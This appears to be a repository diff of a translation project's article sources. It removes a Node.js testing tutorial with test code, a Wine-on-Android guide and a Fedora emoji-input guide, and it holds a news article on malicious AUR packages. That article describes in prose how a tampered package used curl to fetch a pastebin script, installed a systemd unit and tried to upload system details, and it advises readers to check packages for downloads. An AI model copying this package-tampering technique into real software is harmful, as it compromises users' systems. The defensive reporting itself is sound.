So… you’re probably wondering what a test runner _is_ . To be honest, it’s not that complicated. A test runner is the highest component in the test suite. It allows for you to specify global configurations and environments, as well as import fixtures. One would assume this would be simple and easy to do… Right? Not so fast…
|
||||||
|
|
||||||
|
What we learned is that, although there is a solid number of test frameworks out there, not a single one for Node.js provides a unified way to construct your test runner. Sadly, it’s up to the developer to do so. Here’s a quick breakdown of the requirements for a test runner:
|
||||||
|
|
||||||
|
* Ability to load different configurations (e.g. local, test, development) and ensure that you _NEVER_ load a production configuration — you can guess what goes wrong when that happens.
|
||||||
|
|
||||||
|
* Lift and seed a database with dummy data for testing. This must work for various databases, whether it be MySQL, PostgreSQL, MongoDB, or any other, for that matter.
|
||||||
|
|
||||||
|
* Ability to load fixtures (files with seed data for testing in a development environment).
|
||||||
|
|
||||||
|
With Winds, we chose to use Mocha as our test runner. Mocha provides an easy and programmatic way to run tests on an ES6 codebase via command-line tools (integrated with Babel).
|
||||||
|
|
||||||
|
To kick off the tests, we register the Babel module loader ourselves. This provides us with finer grain greater control over which modules are imported before Babel overrides Node.js module loading process, giving us the opportunity to mock modules before any tests are run.
|
||||||
|
|
||||||
|
Additionally, we also use Mocha’s test runner feature to pre-assign HTTP handlers to specific requests. We do this because the normal initialization code is not run during tests (server interactions are mocked by the Chai HTTP plugin) and run some safety check to ensure we are not connecting to production databases.
|
||||||
|
|
||||||
|
While this isn’t part of the test runner, having a fixture loader is an important part of our test suite. We examined existing solutions; however, we settled on writing our own helper so that it was tailored to our requirements. With our solution, we can load fixtures with complex data-dependencies by following an easy ad-hoc convention when generating or writing fixtures by hand.
|
||||||
|
|
||||||
|
### Tooling for Winds
|
||||||
|
|
||||||
|
Although the process was cumbersome, we were able to find the right balance of tools and frameworks to make proper testing become a reality for our backend API. Here’s what we chose to go with:
|
||||||
|
|
||||||
|
### Mocha ☕
|
||||||
|
|
||||||
|
[Mocha][6], described as a “feature-rich JavaScript test framework running on Node.js”, was our immediate choice of tooling for the job. With well over 15k stars, many backers, sponsors, and contributors, we knew it was the right framework for the job.
|
||||||
|
|
||||||
|
### Chai 🥃
|
||||||
|
|
||||||
|
Next up was our assertion library. We chose to go with the traditional approach, which is what works best with Mocha — [Chai][7]. Chai is a BDD and TDD assertion library for Node.js. With a simple API, Chai was easy to integrate into our application and allowed for us to easily assert what we should _expect_ tobe returned from the Winds API. Best of all, writing tests feel natural with Chai. Here’s a short example:
|
||||||
|
|
||||||
|
```
|
||||||
|
describe('retrieve user', () => {
|
||||||
|
let user;
|
||||||
|
|
||||||
|
before(async () => {
|
||||||
|
await loadFixture('user');
|
||||||
|
user = await User.findOne({email: authUser.email});
|
||||||
|
expect(user).to.not.be.null;
|
||||||
|
});
|
||||||
|
|
||||||
|
after(async () => {
|
||||||
|
await User.remove().exec();
|
||||||
|
});
|
||||||
|
|
||||||
|
describe('valid request', () => {
|
||||||
|
it('should return 200 and the user resource, including the email field, when retrieving the authenticated user', async () => {
|
||||||
|
const response = await withLogin(request(api).get(`/users/${user._id}`), authUser);
|
||||||
|
|
||||||
|
expect(response).to.have.status(200);
|
||||||
|
expect(response.body._id).to.equal(user._id.toString());
|
||||||
|
});
|
||||||
|
|
||||||
|
it('should return 200 and the user resource, excluding the email field, when retrieving another user', async () => {
|
||||||
|
const anotherUser = await User.findOne({email: 'another_user@email.com'});
|
||||||
|
|
||||||
|
const response = await withLogin(request(api).get(`/users/${anotherUser.id}`), authUser);
|
||||||
|
|
||||||
|
expect(response).to.have.status(200);
|
||||||
|
expect(response.body._id).to.equal(anotherUser._id.toString());
|
||||||
|
expect(response.body).to.not.have.an('email');
|
||||||
|
});
|
||||||
|
|
||||||
|
});
|
||||||
|
|
||||||
|
describe('invalid requests', () => {
|
||||||
|
|
||||||
|
it('should return 404 if requested user does not exist', async () => {
|
||||||
|
const nonExistingId = '5b10e1c601e9b8702ccfb974';
|
||||||
|
expect(await User.findOne({_id: nonExistingId})).to.be.null;
|
||||||
|
|
||||||
|
const response = await withLogin(request(api).get(`/users/${nonExistingId}`), authUser);
|
||||||
|
expect(response).to.have.status(404);
|
||||||
|
});
|
||||||
|
});
|
||||||
|
|
||||||
|
});
|
||||||
|
```
|
||||||
|
|
||||||
|
### Sinon 🧙
|
||||||
|
|
||||||
|
With the ability to work with any unit testing framework, [Sinon][8] was our first choice for a mocking library. Again, a super clean integration with minimal setup, Sinon turns mocking requests into a simple and easy process. Their website has an extremely friendly user experience and offers up easy steps to integrate Sinon with your test suite.
|
||||||
|
|
||||||
|
### Nock 🔮
|
||||||
|
|
||||||
|
For all external HTTP requests, we use [nock][9], a robust HTTP mocking library that really comes in handy when you have to communicate with a third party API (such as [Stream’s REST API][10]). There’s not much to say about this little library aside from the fact that it is awesome at what it does, and that’s why we like it. Here’s a quick example of us calling our [personalization][11] engine for Stream:
|
||||||
|
|
||||||
|
```
|
||||||
|
nock(config.stream.baseUrl)
|
||||||
|
.get(/winds_article_recommendations/)
|
||||||
|
.reply(200, { results: [{foreign_id:`article:${article.id}`}] });
|
||||||
|
```
|
||||||
|
|
||||||
|
### Mock-require 🎩
|
||||||
|
|
||||||
|
The library [mock-require][12] allows dependencies on external code. In a single line of code, you can replace a module and mock-require will step in when some code attempts to import that module. It’s a small and minimalistic, but robust library, and we’re big fans.
|
||||||
|
|
||||||
|
### Istanbul 🔭
|
||||||
|
|
||||||
|
[Istanbul][13] is a JavaScript code coverage tool that computes statement, line, function and branch coverage with module loader hooks to transparently add coverage when running tests. Although we have similar functionality with CodeCov (see next section), this is a nice tool to have when running tests locally.
|
||||||
|
|
||||||
|
### The End Result — Working Tests
|
||||||
|
|
||||||
|
_With all of the libraries, including the test runner mentioned above, let’s have a look at what a full test looks like (you can have a look at our entire test suite _ [_here_][14] _):_
|
||||||
|
|
||||||
|
```
|
||||||
|
import nock from 'nock';
|
||||||
|
import { expect, request } from 'chai';
|
||||||
|
|
||||||
|
import api from '../../src/server';
|
||||||
|
import Article from '../../src/models/article';
|
||||||
|
import config from '../../src/config';
|
||||||
|
import { dropDBs, loadFixture, withLogin } from '../utils.js';
|
||||||
|
|
||||||
|
describe('Article controller', () => {
|
||||||
|
let article;
|
||||||
|
|
||||||
|
before(async () => {
|
||||||
|
await dropDBs();
|
||||||
|
await loadFixture('initial-data', 'articles');
|
||||||
|
article = await Article.findOne({});
|
||||||
|
expect(article).to.not.be.null;
|
||||||
|
expect(article.rss).to.not.be.null;
|
||||||
|
});
|
||||||
|
|
||||||
|
describe('get', () => {
|
||||||
|
it('should return the right article via /articles/:articleId', async () => {
|
||||||
|
let response = await withLogin(request(api).get(`/articles/${article.id}`));
|
||||||
|
expect(response).to.have.status(200);
|
||||||
|
});
|
||||||
|
});
|
||||||
|
|
||||||
|
describe('get parsed article', () => {
|
||||||
|
it('should return the parsed version of the article', async () => {
|
||||||
|
const response = await withLogin(
|
||||||
|
request(api).get(`/articles/${article.id}`).query({ type: 'parsed' })
|
||||||
|
);
|
||||||
|
expect(response).to.have.status(200);
|
||||||
|
});
|
||||||
|
});
|
||||||
|
|
||||||
|
describe('list', () => {
|
||||||
|
it('should return the list of articles', async () => {
|
||||||
|
let response = await withLogin(request(api).get('/articles'));
|
||||||
|
expect(response).to.have.status(200);
|
||||||
|
});
|
||||||
|
});
|
||||||
|
|
||||||
|
describe('list from personalization', () => {
|
||||||
|
after(function () {
|
||||||
|
nock.cleanAll();
|
||||||
|
});
|
||||||
|
|
||||||
|
it('should return the list of articles', async () => {
|
||||||
|
nock(config.stream.baseUrl)
|
||||||
|
.get(/winds_article_recommendations/)
|
||||||
|
.reply(200, { results: [{foreign_id:`article:${article.id}`}] });
|
||||||
|
|
||||||
|
const response = await withLogin(
|
||||||
|
request(api).get('/articles').query({
|
||||||
|
type: 'recommended',
|
||||||
|
})
|
||||||
|
);
|
||||||
|
expect(response).to.have.status(200);
|
||||||
|
expect(response.body.length).to.be.at.least(1);
|
||||||
|
expect(response.body[0].url).to.eq(article.url);
|
||||||
|
});
|
||||||
|
});
|
||||||
|
});
|
||||||
|
```
|
||||||
|
|
||||||
|
### Continuous Integration
|
||||||
|
|
||||||
|
There are a lot of continuous integration services available, but we like to use [Travis CI][15] because they love the open-source environment just as much as we do. Given that Winds is open-source, it made for a perfect fit.
|
||||||
|
|
||||||
|
Our integration is rather simple — we have a [.travis.yml][16] file that sets up the environment and kicks off our tests via a simple [npm][17] command. The coverage reports back to GitHub, where we have a clear picture of whether or not our latest codebase or PR passes our tests. The GitHub integration is great, as it is visible without us having to go to Travis CI to look at the results. Below is a screenshot of GitHub when viewing the PR (after tests):
|
||||||
|
|
||||||
|
![](https://cdn-images-1.medium.com/max/1600/1*DWfI0No5wZn7BBoWtJsLoA.png)
|
||||||
|
|
||||||
|
In addition to Travis CI, we use a tool called [CodeCov][18]. CodeCov is similar to [Istanbul][19], however, it’s a visualization tool that allows us to easily see code coverage, files changed, lines modified, and all sorts of other goodies. Though visualizing this data is possible without CodeCov, it’s nice to have everything in one spot.
|
||||||
|
|
||||||
|
### What We Learned
|
||||||
|
|
||||||
|
![](https://cdn-images-1.medium.com/max/1600/1*c9uadS4Rk4oQHxf9Gl6Q3g.png)
|
||||||
|
|
||||||
|
We learned a lot throughout the process of developing our test suite. With no “correct” way of doing things, we decided to set out and create our own test flow by sorting through the available libraries to find ones that were promising enough to add to our toolbox.
|
||||||
|
|
||||||
|
What we ultimately learned is that testing in Node.js is not as easy as it may sound. Hopefully, as Node.js continues to grow, the community will come together and build a rock solid library that handles everything test related in a “correct” manner.
|
||||||
|
|
||||||
|
Until then, we’ll continue to use our test suite, which is open-source on the [Winds GitHub repository][20].
|
||||||
|
|
||||||
|
### Limitations
|
||||||
|
|
||||||
|
#### No Easy Way to Create Fixtures
|
||||||
|
|
||||||
|
Frameworks and languages, such as Python’s Django, have easy ways to create fixtures. With Django, for example, you can use the following commands to automate the creation of fixtures by dumping data into a file:
|
||||||
|
|
||||||
|
The Following command will dump the whole database into a db.json file:
|
||||||
|
./manage.py dumpdata > db.json
|
||||||
|
|
||||||
|
The Following command will dump only the content in django admin.logentry table:
|
||||||
|
./manage.py dumpdata admin.logentry > logentry.json
|
||||||
|
|
||||||
|
The Following command will dump the content in django auth.user table: ./manage.py dumpdata auth.user > user.json
|
||||||
|
|
||||||
|
There’s no easy way to create a fixture in Node.js. What we ended up doing is using MongoDB Compass and exporting JSON from there. This resulted in a nice fixture, as shown below (however, it was a tedious process and prone to error):
|
||||||
|
|
||||||
|
|
||||||
|
![](https://cdn-images-1.medium.com/max/1600/1*HvXXS57rAIfBTOQ9h1HCew.png)
|
||||||
|
|
||||||
|
#### Unintuitive Module Loading When Using Babel, Mocked Modules, and Mocha Test-Runner
|
||||||
|
|
||||||
|
To support a broader variety of node versions and have access to latest additions to Javascript standard, we are using Babel to transpile our ES6 codebase to ES5\. Node.js module system is based on the CommonJS standard whereas the ES6 module system has different semantics.
|
||||||
|
|
||||||
|
Babel emulates ES6 module semantics on top of the Node.js module system, but because we are interfering with module loading by using mock-require, we are embarking on a journey through weird module loading corner cases, which seem unintuitive and can lead to multiple independent versions of the module imported and initialized and used throughout the codebase. This complicates mocking and global state management during testing.
|
||||||
|
|
||||||
|
#### Inability to Mock Functions Used Within the Module They Are Declared in When Using ES6 Modules
|
||||||
|
|
||||||
|
When a module exports multiple functions where one calls the other, it’s impossible to mock the function being used inside the module. The reason is that when you require an ES6 module you are presented with a separate set of references from the one used inside the module. Any attempt to rebind the references to point to new values does not really affect the code inside the module, which will continue to use the original function.
|
||||||
|
|
||||||
|
### Final Thoughts
|
||||||
|
|
||||||
|
Testing Node.js applications is a complicated process because the ecosystem is always evolving. It’s important to stay on top of the latest and greatest tools so you don’t fall behind.
|
||||||
|
|
||||||
|
There are so many outlets for JavaScript related news these days that it’s hard to keep up to date with all of them. Following email newsletters such as [JavaScript Weekly][21] and [Node Weekly][22] is a good start. Beyond that, joining a subreddit such as [/r/node][23] is a great idea. If you like to stay on top of the latest trends, [State of JS][24] does a great job at helping developers visualize trends in the testing world.
|
||||||
|
|
||||||
|
Lastly, here are a couple of my favorite blogs where articles often popup:
|
||||||
|
|
||||||
|
* [Hacker Noon][1]
|
||||||
|
|
||||||
|
* [Free Code Camp][2]
|
||||||
|
|
||||||
|
* [Bits and Pieces][3]
|
||||||
|
|
||||||
|
Think I missed something important? Let me know in the comments, or on Twitter – [@NickParsons][25].
|
||||||
|
|
||||||
|
Also, if you’d like to check out Stream, we have a great 5 minute tutorial on our website. Give it a shot [here][26].
|
||||||
|
|
||||||
|
--------------------------------------------------------------------------------
|
||||||
|
|
||||||
|
作者简介:
|
||||||
|
|
||||||
|
Nick Parsons
|
||||||
|
|
||||||
|
Dreamer. Doer. Engineer. Developer Evangelist https://getstream.io.
|
||||||
|
|
||||||
|
--------------------------------------------------------------------------------
|
||||||
|
|
||||||
|
via: https://hackernoon.com/testing-node-js-in-2018-10a04dd77391
|
||||||
|
|
||||||
|
作者:[Nick Parsons][a]
|
||||||
|
译者:[译者ID](https://github.com/译者ID)
|
||||||
|
校对:[校对者ID](https://github.com/校对者ID)
|
||||||
|
|
||||||
|
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||||
|
|
||||||
|
[a]:https://hackernoon.com/@nparsons08?source=post_header_lockup
|
||||||
|
[1]:https://hackernoon.com/
|
||||||
|
[2]:https://medium.freecodecamp.org/
|
||||||
|
[3]:https://blog.bitsrc.io/
|
||||||
|
[4]:https://getstream.io/
|
||||||
|
[5]:https://getstream.io/winds
|
||||||
|
[6]:https://github.com/mochajs/mocha
|
||||||
|
[7]:http://www.chaijs.com/
|
||||||
|
[8]:http://sinonjs.org/
|
||||||
|
[9]:https://github.com/node-nock/nock
|
||||||
|
[10]:https://getstream.io/docs_rest/
|
||||||
|
[11]:https://getstream.io/personalization
|
||||||
|
[12]:https://github.com/boblauer/mock-require
|
||||||
|
[13]:https://github.com/gotwarlost/istanbul
|
||||||
|
[14]:https://github.com/GetStream/Winds/tree/master/api/test
|
||||||
|
[15]:https://travis-ci.org/
|
||||||
|
[16]:https://github.com/GetStream/Winds/blob/master/.travis.yml
|
||||||
|
[17]:https://www.npmjs.com/
|
||||||
|
[18]:https://codecov.io/#features
|
||||||
|
[19]:https://github.com/gotwarlost/istanbul
|
||||||
|
[20]:https://github.com/GetStream/Winds/tree/master/api/test
|
||||||
|
[21]:https://javascriptweekly.com/
|
||||||
|
[22]:https://nodeweekly.com/
|
||||||
|
[23]:https://www.reddit.com/r/node/
|
||||||
|
[24]:https://stateofjs.com/2017/testing/results/
|
||||||
|
[25]:https://twitter.com/@nickparsons
|
||||||
|
[26]:https://getstream.io/try-the-api
|
@ -1,126 +0,0 @@
|
|||||||
How to Run Windows Apps on Android with Wine
|
|
||||||
======
|
|
||||||
|
|
||||||
![](https://www.maketecheasier.com/assets/uploads/2018/07/Wine-Android-featured-image.jpg)
|
|
||||||
|
|
||||||
Wine (on Linux, not the one you drink) is a free and open-source compatibility layer for running Windows programs on Unix-like operating systems. Begun in 1993, it could run a wide variety of Windows programs on Linux and macOS, although sometimes with modification. Now the Wine Project has rolled out version 3.0 which is compatible with your Android devices.
|
|
||||||
|
|
||||||
In this article we will show you how you can run Windows apps on your Android device with WINE.
|
|
||||||
|
|
||||||
**Related** : [How to Easily Install Windows Games on Linux with Winepak][1]
|
|
||||||
|
|
||||||
### What can you run on Wine?
|
|
||||||
|
|
||||||
Wine is only a compatibility layer, not a full-blown emulator, so you need an x86 Android device to take full advantage of it. However, most Androids in the hands of consumers are ARM-based.
|
|
||||||
|
|
||||||
Since most of you are using an ARM-based Android device, you will only be able to use Wine to run apps that have been adapted to run on Windows RT. There is a limited, but growing, list of software available for ARM devices. You can find a list of these apps that are compatible in this [thread][2] on XDA Developers Forums.
|
|
||||||
|
|
||||||
Some examples of apps you will be able to run on ARM are:
|
|
||||||
|
|
||||||
* [Keepass Portable][3]: A password storage wallet
|
|
||||||
* [Paint.NET][4]: An image manipulation program
|
|
||||||
* [SumatraPDF][5]: A document reader for PDFs and possibly some other document types
|
|
||||||
* [Audacity][6]: A digital audio recording and editing program
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
There are also some open-source retro games available like [Doom][7] and [Quake 2][8], as well as the open-source clone, [OpenTTD][9], a version of Transport Tycoon.
|
|
||||||
|
|
||||||
The list of programs that Wine can run on Android ARM devices is bound to grow as the popularity of Wine on Android expands. The Wine project is working on using QEMU to emulate x86 CPU instructions on ARM, and when that is complete, the number of apps your Android will be able to run should grow rapidly.
|
|
||||||
|
|
||||||
### Installing Wine
|
|
||||||
|
|
||||||
To install Wine you must first make sure that your device’s settings allow it to download and install APKs from other sources than the Play Store. To do this you’ll need to give your device permission to download apps from unknown sources.
|
|
||||||
|
|
||||||
1\. Open Settings on your phone and select your Security options.
|
|
||||||
|
|
||||||
|
|
||||||
![wine-android-security][10]
|
|
||||||
|
|
||||||
2\. Scroll down and click on the switch next to “Unknown Sources.”
|
|
||||||
|
|
||||||
![wine-android-unknown-sources][11]
|
|
||||||
|
|
||||||
3\. Accept the risks in the warning.
|
|
||||||
|
|
||||||
![wine-android-unknown-sources-warning][12]
|
|
||||||
|
|
||||||
4\. Open the [Wine installation site][13], and tap the first checkbox in the list. The download will automatically begin.
|
|
||||||
|
|
||||||
![wine-android-download-button][14]
|
|
||||||
|
|
||||||
5\. Once the download completes, open it from your Downloads folder, or pull down the notifications menu and click on the completed download there.
|
|
||||||
|
|
||||||
6\. Install the program. It will notify you that it needs access to recording audio and to modify, delete, and read the contents of your SD card. You may also need to give access for audio recording for some apps you will use in the program.
|
|
||||||
|
|
||||||
![wine-android-app-access][15]
|
|
||||||
|
|
||||||
7\. When the installation completes, click on the icon to open the program.
|
|
||||||
|
|
||||||
![wine-android-icon-small][16]
|
|
||||||
|
|
||||||
When you open Wine, the desktop mimics Windows 7.
|
|
||||||
|
|
||||||
![wine-android-desktop][17]
|
|
||||||
|
|
||||||
One drawback of Wine is that you have to have an external keyboard available to type. An external mouse may also be useful if you are running it on a small screen and find it difficult to tap small buttons.
|
|
||||||
|
|
||||||
You can tap the Start button to open two menus – Control Panel and Run.
|
|
||||||
|
|
||||||
![wine-android-start-button][18]
|
|
||||||
|
|
||||||
### Working with Wine
|
|
||||||
|
|
||||||
When you tap “Control panel” you will see three choices – Add/Remove Programs, Game Controllers, and Internet Settings.
|
|
||||||
|
|
||||||
Using “Run,” you can open a dialogue box to issue commands. For instance, launch Internet Explorer by entering `iexplore`.
|
|
||||||
|
|
||||||
![wine-android-run][19]
|
|
||||||
|
|
||||||
### Installing programs on Wine
|
|
||||||
|
|
||||||
1\. Download the application (or sync via the cloud) to your Android device. Take note of where you save it.
|
|
||||||
|
|
||||||
2\. Open the Wine Command Prompt window.
|
|
||||||
|
|
||||||
3\. Type the path to the location of the program. If you have saved it to the Download folder on your SD card, type:
|
|
||||||
|
|
||||||
4\. To run the file in Wine for Android, simply input the name of the EXE file.
|
|
||||||
|
|
||||||
If the ARM-ready file is compatible, it should run. If not, you’ll see a bunch of error messages. At this stage, installing Windows software on Android in Wine can be hit or miss.
|
|
||||||
|
|
||||||
There are still a lot of issues with this new version of Wine for Android. It doesn’t work on all Android devices. It worked on my Galaxy S6 Edge but not on my Galaxy Tab 4. Many games won’t work because the graphics driver doesn’t support Direct3D yet. You need an external keyboard and mouse to be able to easily manipulate the screen because touch-screen is not fully developed yet.
|
|
||||||
|
|
||||||
Even with these issues in the early stages of release, the possibilities for this technology are thought-provoking. It’s certainly likely that it will take some time yet before you can launch Windows programs on your Android smartphone using Wine without a hitch.
|
|
||||||
|
|
||||||
--------------------------------------------------------------------------------
|
|
||||||
|
|
||||||
via: https://www.maketecheasier.com/run-windows-apps-android-with-wine/
|
|
||||||
|
|
||||||
作者:[Tracey Rosenberger][a]
|
|
||||||
选题:[lujun9972](https://github.com/lujun9972)
|
|
||||||
译者:[译者ID](https://github.com/译者ID)
|
|
||||||
校对:[校对者ID](https://github.com/校对者ID)
|
|
||||||
|
|
||||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
|
||||||
|
|
||||||
[a]:https://www.maketecheasier.com/author/traceyrosenberger/
|
|
||||||
[1]:https://www.maketecheasier.com/winepak-install-windows-games-linux/ (How to Easily Install Windows Games on Linux with Winepak)
|
|
||||||
[2]:https://forum.xda-developers.com/showthread.php?t=2092348
|
|
||||||
[3]:http://downloads.sourceforge.net/keepass/KeePass-2.20.1.zip
|
|
||||||
[4]:http://forum.xda-developers.com/showthread.php?t=2411497
|
|
||||||
[5]:http://forum.xda-developers.com/showthread.php?t=2098594
|
|
||||||
[6]:http://forum.xda-developers.com/showthread.php?t=2103779
|
|
||||||
[7]:http://forum.xda-developers.com/showthread.php?t=2175449
|
|
||||||
[8]:http://forum.xda-developers.com/attachment.php?attachmentid=1640830&d=1358070370
|
|
||||||
[9]:http://forum.xda-developers.com/showpost.php?p=36674868&postcount=151
|
|
||||||
[10]:https://www.maketecheasier.com/assets/uploads/2018/07/Wine-Android-security.png (wine-android-security)
|
|
||||||
[11]:https://www.maketecheasier.com/assets/uploads/2018/07/Wine-Android-unknown-sources.jpg (wine-android-unknown-sources)
|
|
||||||
[12]:https://www.maketecheasier.com/assets/uploads/2018/07/Wine-Android-unknown-sources-warning.png (wine-android-unknown-sources-warning)
|
|
||||||
[13]:https://dl.winehq.org/wine-builds/android/
|
|
||||||
[14]:https://www.maketecheasier.com/assets/uploads/2018/07/Wine-Android-download-button.png (wine-android-download-button)
|
|
||||||
[15]:https://www.maketecheasier.com/assets/uploads/2018/07/Wine-Android-app-access.jpg (wine-android-app-access)
|
|
||||||
[16]:https://www.maketecheasier.com/assets/uploads/2018/07/Wine-Android-icon-small.jpg (wine-android-icon-small)
|
|
||||||
[17]:https://www.maketecheasier.com/assets/uploads/2018/07/Wine-Android-desktop.png (wine-android-desktop)
|
|
||||||
[18]:https://www.maketecheasier.com/assets/uploads/2018/07/Wine-Android-start-button.png (wine-android-start-button)
|
|
||||||
[19]:https://www.maketecheasier.com/assets/uploads/2018/07/Wine-Android-Run.png (wine-android-run)
|
|
@ -1,3 +1,4 @@
|
|||||||
|
Translating by qhwdw
|
||||||
A sysadmin's guide to network management
|
A sysadmin's guide to network management
|
||||||
======
|
======
|
||||||
|
|
||||||
|
@ -1,70 +0,0 @@
|
|||||||
translating---geekpi
|
|
||||||
|
|
||||||
Boost your typing with emoji in Fedora 28 Workstation
|
|
||||||
======
|
|
||||||
|
|
||||||
![](https://fedoramagazine.org/wp-content/uploads/2018/07/emoji-typing-816x345.jpg)
|
|
||||||
|
|
||||||
Fedora 28 Workstation ships with a feature that allows you to quickly search, select and input emoji using your keyboard. Emoji, cute ideograms that are part of Unicode, are used fairly widely in messaging and especially on mobile devices. You may have heard the idiom “A picture is worth a thousand words.” This is exactly what emoji provide: simple images for you to use in communication. Each release of Unicode adds more, with over 200 new ones added in past releases of Unicode. This article shows you how to make them easy to use in your Fedora system.
|
|
||||||
|
|
||||||
It’s great to see emoji numbers growing. But at the same time it brings the challenge of how to input them in a computing device. Many people already use these symbols for input in mobile devices or social networking sites.
|
|
||||||
|
|
||||||
[**Editors’ note: **This article is an update to a previously published piece on this topic.]
|
|
||||||
|
|
||||||
### Enabling Emoji input on Fedora 28 Workstation
|
|
||||||
|
|
||||||
The new emoji input method ships by default in Fedora 28 Workstation. To use it, you must enable it using the Region and Language settings dialog. Open the Region and Language dialog from the main Fedora Workstation settings, or search for it in the Overview.
|
|
||||||
|
|
||||||
[![Region & Language settings tool][1]][2]
|
|
||||||
|
|
||||||
Choose the + control to add an input source. The following dialog appears:
|
|
||||||
|
|
||||||
[![Adding an input source][3]][4]
|
|
||||||
|
|
||||||
Choose the final option (three dots) to expand the selections fully. Then, find Other at the bottom of the list and select it:
|
|
||||||
|
|
||||||
[![Selecting other input sources][5]][6]
|
|
||||||
|
|
||||||
In the next dialog, find the Typing booster choice and select it:
|
|
||||||
|
|
||||||
[![][7]][8]
|
|
||||||
|
|
||||||
This advanced input method is powered behind the scenes by iBus. The advanced input methods are identifiable in the list by the cogs icon on the right of the list.
|
|
||||||
|
|
||||||
The Input Method drop-down automatically appears in the GNOME Shell top bar. Ensure your default method — in this example, English (US) — is selected as the current method, and you’ll be ready to input.
|
|
||||||
|
|
||||||
[![Input method dropdown in Shell top bar][9]][10]
|
|
||||||
|
|
||||||
## Using the new Emoji input method
|
|
||||||
|
|
||||||
Now the Emoji input method is enabled, search for emoji by pressing the keyboard shortcut **Ctrl+Shift+E**. A pop-over dialog appears where you can type a search term, such as smile, to find matching symbols.
|
|
||||||
|
|
||||||
[![Searching for smile emoji][11]][12]
|
|
||||||
|
|
||||||
Use the arrow keys to navigate the list. Then, hit **Enter** to make your selection, and the glyph will be placed as input.
|
|
||||||
|
|
||||||
|
|
||||||
--------------------------------------------------------------------------------
|
|
||||||
|
|
||||||
via: https://fedoramagazine.org/boost-typing-emoji-fedora-28-workstation/
|
|
||||||
|
|
||||||
作者:[Paul W. Frields][a]
|
|
||||||
选题:[lujun9972](https://github.com/lujun9972)
|
|
||||||
译者:[译者ID](https://github.com/译者ID)
|
|
||||||
校对:[校对者ID](https://github.com/校对者ID)
|
|
||||||
|
|
||||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
|
||||||
|
|
||||||
[a]:https://fedoramagazine.org/author/pfrields/
|
|
||||||
[1]:https://fedoramagazine.org/wp-content/uploads/2018/07/Screenshot-from-2018-07-08-15-02-41-1024x718.png
|
|
||||||
[2]:https://fedoramagazine.org/wp-content/uploads/2018/07/Screenshot-from-2018-07-08-15-02-41.png
|
|
||||||
[3]:https://fedoramagazine.org/wp-content/uploads/2018/07/Screenshot-from-2018-07-08-14-33-46-1024x839.png
|
|
||||||
[4]:https://fedoramagazine.org/wp-content/uploads/2018/07/Screenshot-from-2018-07-08-14-33-46.png
|
|
||||||
[5]:https://fedoramagazine.org/wp-content/uploads/2018/07/Screenshot-from-2018-07-08-14-34-15-1024x839.png
|
|
||||||
[6]:https://fedoramagazine.org/wp-content/uploads/2018/07/Screenshot-from-2018-07-08-14-34-15.png
|
|
||||||
[7]:https://fedoramagazine.org/wp-content/uploads/2018/07/Screenshot-from-2018-07-08-14-34-41-1024x839.png
|
|
||||||
[8]:https://fedoramagazine.org/wp-content/uploads/2018/07/Screenshot-from-2018-07-08-14-34-41.png
|
|
||||||
[9]:https://fedoramagazine.org/wp-content/uploads/2018/07/Screenshot-from-2018-07-08-15-05-24-300x244.png
|
|
||||||
[10]:https://fedoramagazine.org/wp-content/uploads/2018/07/Screenshot-from-2018-07-08-15-05-24.png
|
|
||||||
[11]:https://fedoramagazine.org/wp-content/uploads/2018/07/Screenshot-from-2018-07-08-14-36-31-290x300.png
|
|
||||||
[12]:https://fedoramagazine.org/wp-content/uploads/2018/07/Screenshot-from-2018-07-08-14-36-31.png
|
|
@ -1,45 +0,0 @@
|
|||||||
translating---geekpi
|
|
||||||
|
|
||||||
Malware Found On The Arch User Repository (AUR)
|
|
||||||
======
|
|
||||||
|
|
||||||
On July 7, an AUR package was modified with some malicious code, reminding [Arch Linux][1] users (and Linux users in general) that all user-generated packages should be checked (when possible) before installation.
|
|
||||||
|
|
||||||
[AUR][3] , or the Arch (Linux) User Repository contains package descriptions, also known as PKGBUILDs, which make compiling packages from source easier. While these packages are very useful, they should never be treated as safe, and users should always check their contents before using them, when possible. After all, the AUR webpage states in bold that "AUR packages are user produced content. Any use of the provided files is at your own risk."
|
|
||||||
|
|
||||||
The [discovery][4] of an AUR package containing malicious code proves this. [acroread][5] was modified on July 7 (it appears it was previously "orphaned", meaning it had no maintainer) by an user named "xeactor" to include a `curl` command that downloaded a script from a pastebin. The script then downloaded another script and installed a systemd unit to run that script periodically.
|
|
||||||
|
|
||||||
**It appears [two other][2] AUR packages were modified in the same way. All the offending packages were removed and the user account (which was registered in the same day those packages were updated) that was used to upload them was suspended.**
|
|
||||||
|
|
||||||
The malicious code didn't do anything truly harmful - it only tried to upload some system information, like the machine ID, the output of `uname -a` (which includes the kernel version, architecture, etc.), CPU information, pacman information, and the output of `systemctl list-units` (which lists systemd units information) to pastebin.com. I'm saying "tried" because no system information was actually uploaded due to an error in the second script (the upload function is called "upload", but the script tried to call it using a different name, "uploader").
|
|
||||||
|
|
||||||
Also, the person adding these malicious scripts to AUR left the personal Pastebin API key in the script in cleartext, proving once again that they don't know exactly what they are doing.
|
|
||||||
|
|
||||||
The purpose for trying to upload this information to Pastebin is not clear, especially since much more sensitive data could have been uploaded, like GPG / SSH keys.
|
|
||||||
|
|
||||||
**Update:** Reddit user u/xanaxdroid_ [mentions][6] that the same user named "xeactor" also had some cryptocurrency mining packages posted, so he speculates that "xeactor" was probably planning on adding some hidden cryptocurrency mining software to AUR (this was also the case with some Ubuntu Snap packages [two months ago][7]). That's why "xeactor" was probably trying to obtain various system information. All the packages uploaded by this AUR user have been removed so I cannot check this.
|
|
||||||
|
|
||||||
**Another update:**
|
|
||||||
|
|
||||||
What exactly should you check in user-generated packages such as those found in AUR? This varies and I can't tell you exactly but you can start by looking for anything that tries to download something using `curl` , `wget` and other similar tools, and see what exactly they are attempting to download. Also check the server from which the package source is downloaded from and make sure it's the official source. Unfortunately this is not an exact 'science'. For Launchpad PPAs for example, things get more complicated as you must know how Debian packaging works, and the source can be altered directly as it's hosted in the PPA and uploaded by the user. It gets even more complicated with Snap packages, because you cannot check such packages before installation (as far as I know). In these latter cases, and as a generic solution, I guess you should only install user-generated packages if you trust the uploader / packager.
|
|
||||||
|
|
||||||
|
|
